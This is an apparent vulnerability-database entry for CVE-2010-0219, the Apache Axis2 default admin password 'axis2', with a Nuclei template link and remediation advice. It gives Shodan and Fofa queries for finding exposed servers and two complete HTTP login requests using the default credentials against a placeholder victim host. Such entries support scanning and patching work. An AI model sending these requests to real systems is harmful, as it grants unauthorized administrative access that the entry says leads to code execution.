| Title | Apache Axis2 Default Login |
|---|---|
| Author | pikpikcu |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or the ability to modify or delete data. |
| Remediation | Disable or restrict access to the Axis2 web interface, or apply the necessary patches or updates provided by the vendor. |
| CVSS Score | 10 |
| EPSS Score | 0.93421 |
| CVE ID | CVE-2010-0219 |
| CWE ID | CWE-255 |
| Shodan Query | http.html:"Apache Axis"http.html:"apache axis" |
| Fofa Query | body="apache axis" |
| Tags | cve cve2010 axis apache default-login axis2 vkev vuln |
Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.
POST /axis2/axis2-admin/login HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15
Content-Length: 44
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close
userName=admin&password=axis2&submit=+Login+
POST /axis2-admin/login HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 39
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close
loginUsername=admin&loginPassword=axis2
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2010/CVE-2010-0219.yaml
🦈 Packet Capture: ⬇️ Download cve-2010-0219.pcap
N/AN/A